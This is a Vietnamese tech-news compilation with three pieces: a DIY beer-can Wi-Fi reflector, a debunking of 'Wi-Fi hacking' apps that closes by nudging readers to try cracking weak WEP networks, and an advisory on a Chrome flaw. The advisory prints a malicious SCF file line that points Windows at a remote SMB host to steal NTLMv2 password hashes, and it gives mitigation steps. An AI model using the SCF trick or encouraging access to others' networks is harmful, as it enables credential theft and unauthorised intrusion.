Mẹo tăng sóng Wi-Fi không cần tốn tiền

Mới đây, các nhà nghiên cứu thuộc ĐH Dartmouth (Mỹ) đã chế tạo thành công một vật dụng có kiểu dáng đặc biệt, được phủ nhôm bên ngoài nhằm cải thiện phạm vi phát sóng WiFi và tăng cường bảo mật.

Vật dụng mà các nhà nghiên cứu thử nghiệm là một tấm phản chiếu được đặt xung quanh router WiFi nhằm định hình lại tia sóng, tăng phạm vi và ngăn không cho sóng đi qua những không gian khác. Trợ lý giáo sư tại ĐH Dartmouth (Mỹ) Xia Zhou chia sẻ: Người dùng chỉ tốn khoảng 35 USD và một chút kiến thức về mạng là có thể sử dụng thiết bị này để điều chỉnh sóng thay vì mua ăngten rời.

Sau một vài thử nghiệm, các nhà nghiên cứu đã có thể điều khiển sóng WiFi và đưa nó đến các căn phòng ở xa. Tính bảo mật và độ bao phủ của WiFi nhờ vậy được tăng lên đáng kể. Nói một cách dễ hiểu, bạn có thể định hướng các chùm sóng WiFi tránh đi ra cửa sổ và thoát ra ngoài, đồng thời tập trung sóng về một khu vực trong căn phòng.

Bài viết này sẽ hướng dẫn bạn đọc cách tạo thiết bị tăng sóng WiFi cho router đơn giản bằng vỏ lon bia hoặc lon nước ngọt.

- Bước 1: Đầu tiên, bạn hãy rửa sạch lon bia hoặc lon nước ngọt và tháo rời phần móc giật nắp lon.

- Bước 2: Sử dụng dao rọc giấy và cắt đứt hẳn phần đáy lon bia theo đường màu đỏ như hình bên dưới.

- Bước 3: Thực hiện tương tự cho phần nắp trên, tuy nhiên phần này bạn không cắt đứt mà phải chừa lại một khoảng nhỏ.

- Bước 4: Khi hoàn tất, bạn hãy cắt dọc lon bia và bẻ nó ra như hình cánh cung.

- Bước 5: Cuối cùng, móc lon bia vào ăngten cũ trên router và xoay thiết bị này về khu vực cần phủ sóng.

Bên cạnh đó, người dùng cũng có thể tận dụng router cũ để tạo điểm phát sóng mới (access point) hoặc mở rộng vùng phủ sóng (repeater) nhằm tiết kiệm chi phí.

Chúc các bạn thành công nhé!

Có hay không 1 ứng dụng 'hack Wi-Fi' thực thụ?

Lướt 1 vòng các kho ứng dụng lớn như Google Play hay Apple Store, khá dễ dàng nhận ra có nhiều ứng dụng với tên gợi ý hoặc các đoạn mô tả, quảng cáo về khả năng truy cập vào các mạng Wifi có mật khẩu. Hẳn là cũng không ít người từng 1 lần đi tìm những ứng dụng như thế. Vậy thì liệu có nên và có thể hack được mật khẩu Wifi chỉ với những thiết bị cầm tay?

Đáp án thì có cho các bạn rồi, nhưng tôi vẫn muốn cùng các bạn tìm hiểu kỹ hơn một chút, cùng nhau làm rõ hơn về vấn đề này.

Sự thật là mật khẩu Wifi không thể bị hack một cách đơn giản

Wifi là tên gọi thường dùng mà chúng ta hay gọi một mạng không dây nội bộ - Wireless Local Area Network (WLAN). Mạng không dây mang đến sự tiện lợi rõ rệt so với kiểu kết nối bằng cáp mạng truyền thống. Thiết bị nào được trang bị anten thu sóng là có thể kết nối vào Wifi, miễn là ở trong vùng phủ sóng.

Nhưng sự tiện lợi cũng mang đến nguy cơ mới. Nói một cách đơn giản là nếu nhà bạn có trang bị Wifi thì bất kỳ vị khách qua đường nào cũng có thể vào trong, vì nhà bạn chưa gắn cửa. Mật khẩu cho Wifi ra đời là cánh cửa ngăn thế giới bên ngoài và mạng nội bộ của bạn.

Cửa có nhiều kiểu, tương tự mật khẩu Wifi cũng có nhiều chuẩn mã hóa bảo mật. Chuẩn càng mới thì càng an toàn hơn, khó bị qua mặt hơn. Trước đây Wifi hay được mã hóa bởi chuẩn WEP, chuẩn này có thể bị vượt qua một cách tương đối dễ dàng (nếu có chút ít kiến thức chuyên môn). Sau này, chuẩn WEP gần như đã biến mất nhường chỗ cho WPA và WPA2 trong môi trường sử dụng cá nhân và gia đình.

Nói đến đây, hy vọng các bạn có Wifi ở nhà hãy bỏ đi nỗi lo bị hàng xóm... "xài chùa". Lý do là vì không một người hàng xóm nào đủ khả năng vượt rào Wifi mã hóa theo chuẩn WPA2 cả. Dù hàng xóm nhà bạn làm kỹ sư cho Microsoft, Google, Apple, Kaspersky, BitDefender hay Cisco (hãng chuyên về thiết bị mạng)... thì cũng cứ yên tâm.

Vậy thì thực sự các ứng dụng mang danh Hack Wifi có hoạt động được hay không?

Câu trả lời không phải là có hay không, mà tôi muốn khuyên các bạn không nên phí công sức và thời gian vào việc tìm kiếm, thử nghiệm các ứng dụng kiểu này. Chúng chẳng hề có một tí xíu tác dụng nào như tên gọi hay những lời quảng cáo có cánh đâu.

Một số ứng dụng còn có phần mô tả khá rõ ràng (thường là tiếng Anh) rằng nó chỉ là một ứng dụng giải trí. Mục đích là giúp chủ nhân... ra oai với bạn bè rằng anh/cô ta có thể hack được Wifi chỉ với vài cái chạm màn hình.

Nhưng nếu vượt khỏi mục đích trêu ghẹo, đùa vui thì việc tìm những ứng dụng kiểu này có thể dẫn bạn đến những ứng dụng rác. Chúng được lập trình để âm thầm thu thập các thông tin cá nhân (thông qua các quyền truy cập vào dữ liệu trên điện thoại) hay tự động gửi các tin nhắn dịch vụ gây tiêu tốn tài khoản của bạn.

Và thậm chí, nếu quá mê mẩn với các ứng dụng "tào lao" này, bạn có thể bị dẫn dụ đến các kho ứng dụng của bên thứ ba hay các tập tin cài đặt nằm "vất vưởng" đâu đó trên Internet. Khi này thì các cơ chế bảo vệ mà những Google hay Apple dùng để kiểm soát ứng dụng trên các kho của họ chẳng còn tác dụng gì nữa.

Nhưng tôi vẫn muốn truy cập vào mạng Wifi bất kỳ khi nào có thể

Câu trả lời nằm ở những cái tên như Wifi Chùa hay Foody...

Wifi Chùa có thể được xem như một mạng xã hội thu nhỏ nơi người dùng có thể cung cấp các mật khẩu Wifi công cộng như của các cửa hàng, trung tâm thương mại, hàng quán... cho cộng đồng. Qua thử nghiệm thực tế của tôi thì đa số các mật khẩu Wifi Chùa cung cấp đều chính xác, số lượng địa điểm nhiều, độ phủ khá rộng.

Foody cũng là một cái tên không xa lạ - mạng xã hội cho những người mê ăn uống. Mạng này cũng dành một góc nhỏ để cộng đồng đóng góp mật khẩu Wifi của địa điểm, cửa hàng đó. Xét về số lượng và chất lượng thì có vẻ không được như Wifi Chùa nhưng cũng khá tiện lợi khi bạn có thể tìm kiếm thông tin của nhà hàng và đồng thời thấy được mật khẩu Wifi ngay trong đó.

Xin một lần nhắc lại với các bạn rằng mật khẩu Wifi không thể nào bị phá một cách dễ dàng chỉ bằng những chiếc smartphone với bộ vi xử lý còn khá "non kém" của mình. Hiện tại thì cách đơn giản nhất để truy cập vào một mạng Wifi là hỏi thẳng chủ nhân.

Ngược lại nếu bạn thích đi con đường khó khăn hơn, hãy tìm một điểm phát Wifi với chuẩn mã hóa là WEP, không phải WPA. Khi đã đến nơi, bạn cần một chiếc máy tính đúng nghĩa, một chút hiểu biết về mạng, hệ điều hành cũng như trông chờ may mắn nếu gia chủ đặt mật khẩu đơn giản. Sau khi hội đủ các yếu tố trên, hãy bắt tay vào "hack". Chúc bạn may mắn!

Nguồn: Internet - Thái Bình

Cẩn thận kẻo mất thông tin đăng nhập PC vì một lỗ hổng Google Chrome

Nhóm nghiên cứu của DefenseCode vừa công bố một lỗ hổng của trình duyệt Google Chrome chạy trên bất kỳ hệ điều hành Windows nào.

Theo NexttoWindows, đây là cách lỗ hổng này bị khai thác:

Đầu tiên, đánh lừa người dùng Chrome tải về một tập tin Windows Explorer Shell Command File (có đuôi là *.scf) có thể đánh lừa người dùng đăng nhập vào một máy chủ SMB từ xa - nó sẽ hiển thị lên một hộp thoại yêu cầu người dùng nhập vào username và password đăng nhập Windows, mục đích là sẽ đánh cắp thông tin mã băm mật khẩu của phương thức chứng thực Microsoft LAN Manager (NTLMv2) trên máy tính cùa nạn nhân.

Mã băm có thể bị "bẻ khóa" ngoại tuyến (offline) hoặc được dùng để giả mạo nạn nhân trên một dịch vụ nào đó chấp nhận cùng phương thức chứng thực NTLMv2.

Windows Explorer Shell Command File hay gọi tắt là SCF (có phần đuôi là *.scf) là một kiểu tập tin được biết đến từ thời Windows 98, chủ yếu được dùng làm lối tắt cho Show Desktop - nhằm hiển thị màn hình desktop. Về cơ bản, nó là một tập tin văn bản với 2 phần, một phần xác định lệnh nào sẽ được thực thi, và một phần chỉ ra vị trí của tập tin biểu tượng, chẳng hạn như:

[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop

Và nó có thể dễ dàng bị thay đổi để đánh lừa Windows thực hiện chứng thực đăng nhập vào một máy chủ SMB nào đó từ xa, như bên dưới:

[Shell]
IconFile=\\170.170.170.170\icon

Yêu cầu này được thực thi ngay khi thư mục chứa dữ liệu tải về được mở ra trong Windows File Explorer. Bạn sẽ không cần phải kích hoạt hay double click để mở tập tin tải về bởi vì Windows File Explorer sẽ tự động thử tìm tập tin "icon" trong file SCF ở trên.

Vậy thì lỗi của Google Chrome ở chỗ nào?

Theo mặc định, trình duyệt Chrome sẽ tự động tải về tập tin mà nó cho là an toàn mà không hỏi người dùng nơi lưu trữ tập tin này. Và Chrome nghĩ rằng các tập tin SCF là an toàn mà không cảnh báo như đối với những tập tin có phần mở rộng là LNK (*.lnk). Như trong bài đăng của DefenseCode có đoạn:

Về quan điểm bảo mật, tính năng này (tự động lưu tập tin mà không hỏi người dùng của Chrome) không phải là một hành vi tốt, bởi vì thông thường bất kỳ nội dung nguy hại nào cũng cần người dùng mở lên thì nó mới có khả năng gây nguy hại. Vậy thì điều gì sẽ xảy ra nếu như một tập tin được tải về lại không cần tới sự tương tác của người dùng thì đã thực hiện những hành vi nguy hại? Có loại tập tin nào có thể làm được điều đó không?

Những trình duyệt đối thủ như IE, Microsoft Edge, Firefox, và Safari không cho phép tự động tải về các tập tin SCF.

Trong khi Google làm việc để tìm ra giải pháp sửa lỗi này, DefenseCode đề nghị người dùng nên vô hiệu hóa tính năng tự động tải về trên Google Chrome để tự đảm bảo an toàn cho bản thân mình. Cách làm như sau:

Trên trình duyệt Google Chrome, click vào biểu tượng dấu 3 chấm ở góc trên bên phải màn hình. Trong menu hiện ra, click vào Cài đặt (Settings).

Trong trang hiện ra, bạn kéo xuống phần Tải về (Downloads) và đánh dấu chọn ở mục "Hỏi vị trí lưu từng tệp trước khi tải xuống" (Ask where to save each file before downloading).